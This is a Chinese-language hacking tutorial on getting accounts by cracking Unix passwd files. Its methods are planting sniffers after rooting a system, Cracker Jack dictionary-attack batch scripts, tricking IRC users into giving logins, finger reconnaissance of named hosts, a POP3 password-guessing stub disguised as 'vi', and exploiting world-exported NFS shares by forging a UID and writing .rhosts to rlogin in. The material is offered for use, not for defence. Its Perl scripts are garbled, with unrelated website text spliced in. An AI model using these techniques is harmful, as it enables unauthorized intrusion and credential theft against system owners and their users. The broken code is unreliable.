破解(Cracking)passwrd 文档
有很多方法可以获得一个起始帐号.我将深入每个方面帮助你开始.你所需的只是一个好的帐号,用来获得数百个帐号.想一想这:你进入一个很好的可以利用的系统(大多是Linux机器;),夺取root权限并装上一个Sniffer(嗅探器);这个TCP sniffer 将监测到网络上任何login(登陆)过程并记录下所有Telnet,Ftp或拨号进出的Login 名和口令;这样即使是一个小以太网你也可获得大约100个口令,如果是一个更大的网络供应商你就会得到全世界的数百个帐号!这一切,你只要有某个可利用系统的一个好帐号和口令就可做到!如果你看起来无法利用某系统的root权限,那就拿它来破解口令,用来和那些但没有shell帐号或磁盘空间的其他hacker及IRC使用者交换.决不要把一个你有root权限的系统的口令给出去!你自己留着它!
破解passwd 文档
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
gcc su.c -o su
.bash_profile 结构如下:
# .bash_profile
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
# User specific environment and startup programs
你可在/etc目录下的passwd文档前部找到管理员的用户名.只需打:more passwd
历史文档在每个用户目录里.通过阅读它们,你可看到该用户最近使用过的命令,有时能看到最近的100多个命令.寻找.bash_history或history文件,你可用more命令读它们:more .bash_history,也可:more .b*或more .b(然后按键盘上的Tab键).
OK,现在你需要一个好的password破解程序.下一章你可看到在没有帐号时如何从系统夺取password文档.但是it is catch 22(我不懂了?:译者),你还是要用到password破解程序.
1. Password破解程序
2. 好的字典档
3. Password 文档
此外还要找一些好字典档.最好的字典档就是名字(names)了.你会在网络上发现最不可靠的口令如男孩的女友名,女孩的男友名啦:)象如'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'’ hackersdict’这样为名的字典档是最好的.
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : domain.com.passwd
Wordfile : domain.com.passwd
上面把password文档作为字典档.这会让你先找出那些用登陆名(Login name)作口令的用户,如果用真名(real name )或公司名之类的信息的话,也能马上猜中.这样你就不用苦苦等候程序搜索整个字典档了.
------------ start of dicthash.bat
@echo off
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2
---------------- end of dicthash.bat
---------------- start of jackhash.bat
@echo off
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your password file.
echo - Then use this batch file using the following format:
echo -
echo - jackhash.bat passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - jackhash will first load jack running the passwd file against
echo - itself in both upper and lower cases, then it will add numbers 0-9
echo - both to the begining and end of every dict word. This will take
echo - a while, so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you ;)
jpp -gecos:5 -lower %1 | jack -stdin %1
jpp -gecos:5 %1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1
jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1
jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1
jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1
--------------- end of jackhash.bat
还有其他方法不用费那么大力就可获得帐号.在IRC上建一与hacking有关名字的频道等候或加入已有的IRC频道,如:#hacking #unix #unixhacking #hack #hackers #hacker #virus #virii
用/msg发消息给他使得其他人看不出你和他交谈.然后问他问题,尝试帮助他,但不必太尽力;).最后告诉他你可为他login上去帮他解决问题.这有可能让你拿到passwd 文档或其他东东.应承他任何事(promise him the world)以获取login口令.现在你不就有了起始帐号可以开始你的学习进程了.如果在夺取系统的root时候你不想暴露自己,可告诉他其他吸引他的东东让他在你侦听系统的其他口令时忙着.
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
Login:chris Passwword 试一试:Chris,chris,myers,Myers,chrismyers,等等…
[10:35am][/home/ii]finger -l @starnet.net
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
----- cut here
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己写一小perl脚本程序,能自动finger 列表中的域名并记录响应信息到文件中,finger完后返回并尝试使用pop3端口,以 用户名-用户名(或其他信息)方式(译注:即口令用用户名或其他信息)登陆,记录响应信息到另一文件中.(这就是Emailcrk的原理)
"perl getdomain.pl com.zone com >com.all"
perl getdomain.pl edu.zone edu >edu.all
下面是perl 脚本:
---- cut here
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
# Close input file and output data structure to STDOUT.
foreach (sort(keys(%hash))) {
print "?用户名:@HackBase.net密?码:
sub usage {
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
---- cut here - end of script -----
要使用上述脚本,你只需把上面几行copy下来命名为getdomain.pl,拷贝到unix系统中,运行: chmod x getdomain.pl
$root> showmount -e wwa.com
ount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive
$root> showmount -e seva.net
Export list for seva.net:
/var/mail pluto.seva.net
/home/user1 pluto.seva.net
/usr/local pluto.seva.net,rover.seva.net
/export/X11R6.3 rover.seva.net
/export/rover rover.seva.net,pluto.seva.net
/export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone)
注意上面的“everyone”,如果我们想从这家伙里安装linux 的话会很好.但我们是想打开用户的目录...所以继续下一个:
$root> showmount -e XXXXX.XXX ) {
print "Now checking:?用户名:@HackBase.net密?码:
# Note difference in program output capture from "geturl.pl".
open (EXECFILE, "$program?用户名:@HackBase.net密?码:
@execResult = ;
next if (!defined($execResult[0]));
if ($execResult[0] =~ /^Export/) {
print " - Export list saved.";
open (OUTFILE, ">?用户名:@HackBase.net密?码:
foreach (@execResult) {
print OUTFILE;
close (OUTFILE);
print "\n";
# We are done. Close all files and end the program.
----------------- end of cmount.pl
假设我们运行showmount -e domain.com 并返回:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
我们想连接(mount) / 目录..哟呵…这家伙把整个系统都共享(mountable)了
$root> mkdir /tmp/mount
root> mount -nt nfs domain.com:/ /tmp/mount
$root> mount -nt nfs domain.com:/home /tmp/mount
$root> umount /tmp/mount
bash# ls -al /mnt ; 确定/mnt是空的
ls: /mnt: No such file or directory ; 不存在这样的文件或目录 ;)
bash# mkdir /mnt ; 让我们为他建一个(/mnt目录)
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; 开始 mount 这小家伙 ...
bash# cd /mnt ; 进入mounted的目录.
bash# ls ; 简单的dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost found radius-961029.ps
bash# ; the home dir就在那了 ... oh 很好...
bash# cd home
bash# ls -l ; 列长目录... 这儿tom 看起来不错 ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; 注意到tom 是 302号使用者 ... hmmm 把他放进我们的passwd 文档中.
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; 搞定 ;)
bash# su - tom ; su 到 tom 帐号 ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; 注意上面,toms 的用户号没有了... 现在我们拥有了他的目录!
bash$ echo >>tom/.rhosts ; 在tom的目录里建一个名为 .rhosts 的文档
(bash$ ;在.rhosts中加入 号,每个人都能用rlogin到他的帐户。)
bash$ rlogin xxxxx.xxx 在我们的机器上我们是tom了 , 因此rlogin 上平台.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> 雅皮士们 ,我们进去了!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts
破解(Cracking)passwrd 文档
